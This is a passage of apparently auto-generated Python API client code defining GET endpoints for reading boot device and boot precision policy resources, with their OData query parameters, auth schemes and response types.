        'enum': [
            'inlinecount',
        ],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python parameter name -> wire (OData) name.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query', 'orderby': 'query', 'top': 'query',
            'skip': 'query', 'select': 'query', 'expand': 'query',
            'apply': 'query', 'count': 'query', 'inlinecount': 'query',
            'at': 'query', 'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_device_boot_security_list
)
def __get_boot_hdd_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.HddDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_hdd_device_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootHddDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/HddDevices/{Moid} — read a single
# 'boot.HddDevice' resource by its Moid path parameter.
self.get_boot_hdd_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootHddDevice,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
        'operation_id': 'get_boot_hdd_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_hdd_device_by_moid
)
def __get_boot_hdd_device_list(
    self,
    **kwargs
):
    """Read a 'boot.HddDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_hdd_device_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to return
            with the primary resources. [optional]
        apply (str): One or more $apply transformations (aggregate/groupby)
            to perform on the resources. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count of the matching resources
            with the response. [optional]
        at (str): Like $filter, but applied to versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootHddDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/HddDevices — list 'boot.HddDevice' resources
# with the standard OData query parameters.
self.get_boot_hdd_device_list = _Endpoint(
    settings={
        'response_type': (BootHddDeviceResponse,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/HddDevices',
        'operation_id': 'get_boot_hdd_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All supported query parameters; none is required.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': [
            'inlinecount',
        ],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python parameter name -> wire (OData) name.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query', 'orderby': 'query', 'top': 'query',
            'skip': 'query', 'select': 'query', 'expand': 'query',
            'apply': 'query', 'count': 'query', 'inlinecount': 'query',
            'at': 'query', 'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_hdd_device_list
)
def __get_boot_iscsi_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.IscsiDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_iscsi_device_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootIscsiDevice
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/IscsiDevices/{Moid} — read a single
# 'boot.IscsiDevice' resource by its Moid path parameter.
self.get_boot_iscsi_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootIscsiDevice,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
        'operation_id': 'get_boot_iscsi_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'moid': (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_iscsi_device_by_moid
)
def __get_boot_iscsi_device_list(
    self,
    **kwargs
):
    """Read a 'boot.IscsiDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_iscsi_device_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to return
            with the primary resources. [optional]
        apply (str): One or more $apply transformations (aggregate/groupby)
            to perform on the resources. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count of the matching resources
            with the response. [optional]
        at (str): Like $filter, but applied to versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return the response data without the
            HTTP status code and headers. Default is True.
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding the body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a pair
            (tuple) of (connection, read) timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the server.
            Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootIscsiDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard per-request options in one pass; setdefault
    # leaves any caller-supplied values untouched.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint: GET /api/v1/boot/IscsiDevices — list 'boot.IscsiDevice'
# resources with the standard OData query parameters.
self.get_boot_iscsi_device_list = _Endpoint(
    settings={
        'response_type': (BootIscsiDeviceResponse,),
        # NOTE: the generated spec listed 'oAuth2' twice; a single entry is
        # sufficient because auth settings are looked up per scheme name.
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/IscsiDevices',
        'operation_id': 'get_boot_iscsi_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All supported query parameters; none is required.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': [
            'inlinecount',
        ],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python parameter name -> wire (OData) name.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query', 'orderby': 'query', 'top': 'query',
            'skip': 'query', 'select': 'query', 'expand': 'query',
            'apply': 'query', 'count': 'query', 'inlinecount': 'query',
            'at': 'query', 'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_iscsi_device_list
)
def __get_boot_nvme_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.NvmeDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_nvme_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootNvmeDevice, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/NvmeDevices/{Moid}.
self.get_boot_nvme_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootNvmeDevice,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
        'operation_id': 'get_boot_nvme_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_nvme_device_by_moid
)
def __get_boot_nvme_device_list(
    self,
    **kwargs
):
    """Read a 'boot.NvmeDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_nvme_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            subset of entries to return. [optional] if omitted the
            server defaults to ""
        orderby (str): properties used to sort the collection.
            [optional]
        top (int): maximum number of resources to return. [optional]
            if omitted the server defaults to 100
        skip (int): number of resources to skip. [optional] if omitted
            the server defaults to 0
        select (str): subset of properties to return. [optional] if
            omitted the server defaults to ""
        expand (str): additional attributes or related resources to
            include with the primary resources. [optional]
        apply (str): sequence of aggregation transformations
            ('aggregate' and/or 'groupby'), separated by forward
            slashes and applied in order. [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources in the response. [optional] if omitted the
            server defaults to "allpages"
        at (str): like '$filter', but matches against versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization (tag keys,
            usage counts and assigned values) for this resource.
            [optional]
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootNvmeDeviceResponse, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/NvmeDevices; dispatches to the
# private request builder above via call_with_http_info.
self.get_boot_nvme_device_list = _Endpoint(
    settings={
        'response_type': (BootNvmeDeviceResponse,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/NvmeDevices',
        'operation_id': 'get_boot_nvme_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All parameters are optional query parameters.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData-style query options are prefixed with '$' on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            param: 'query'
            for param in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_nvme_device_list
)
def __get_boot_pch_storage_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.PchStorageDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_pch_storage_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPchStorageDevice, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/PchStorageDevices/{Moid}.
self.get_boot_pch_storage_device_by_moid = _Endpoint(
    settings={
        'response_type': (BootPchStorageDevice,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
        'operation_id': 'get_boot_pch_storage_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_pch_storage_device_by_moid
)
def __get_boot_pch_storage_device_list(
    self,
    **kwargs
):
    """Read a 'boot.PchStorageDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_pch_storage_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            subset of entries to return. [optional] if omitted the
            server defaults to ""
        orderby (str): properties used to sort the collection.
            [optional]
        top (int): maximum number of resources to return. [optional]
            if omitted the server defaults to 100
        skip (int): number of resources to skip. [optional] if omitted
            the server defaults to 0
        select (str): subset of properties to return. [optional] if
            omitted the server defaults to ""
        expand (str): additional attributes or related resources to
            include with the primary resources. [optional]
        apply (str): sequence of aggregation transformations
            ('aggregate' and/or 'groupby'), separated by forward
            slashes and applied in order. [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources in the response. [optional] if omitted the
            server defaults to "allpages"
        at (str): like '$filter', but matches against versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization (tag keys,
            usage counts and assigned values) for this resource.
            [optional]
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPchStorageDeviceResponse, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/PchStorageDevices; dispatches to
# the private request builder above via call_with_http_info.
self.get_boot_pch_storage_device_list = _Endpoint(
    settings={
        'response_type': (BootPchStorageDeviceResponse,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PchStorageDevices',
        'operation_id': 'get_boot_pch_storage_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All parameters are optional query parameters.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData-style query options are prefixed with '$' on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            param: 'query'
            for param in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_pch_storage_device_list
)
def __get_boot_precision_policy_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.PrecisionPolicy' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_precision_policy_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPrecisionPolicy, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/PrecisionPolicies/{Moid}.
self.get_boot_precision_policy_by_moid = _Endpoint(
    settings={
        'response_type': (BootPrecisionPolicy,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
        'operation_id': 'get_boot_precision_policy_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_precision_policy_by_moid
)
def __get_boot_precision_policy_list(
    self,
    **kwargs
):
    """Read a 'boot.PrecisionPolicy' resource. # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned and the result
    is retrieved via thread.get().
    >>> thread = api.get_boot_precision_policy_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            subset of entries to return. [optional] if omitted the
            server defaults to ""
        orderby (str): properties used to sort the collection.
            [optional]
        top (int): maximum number of resources to return. [optional]
            if omitted the server defaults to 100
        skip (int): number of resources to skip. [optional] if omitted
            the server defaults to 0
        select (str): subset of properties to return. [optional] if
            omitted the server defaults to ""
        expand (str): additional attributes or related resources to
            include with the primary resources. [optional]
        apply (str): sequence of aggregation transformations
            ('aggregate' and/or 'groupby'), separated by forward
            slashes and applied in order. [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources in the response. [optional] if omitted the
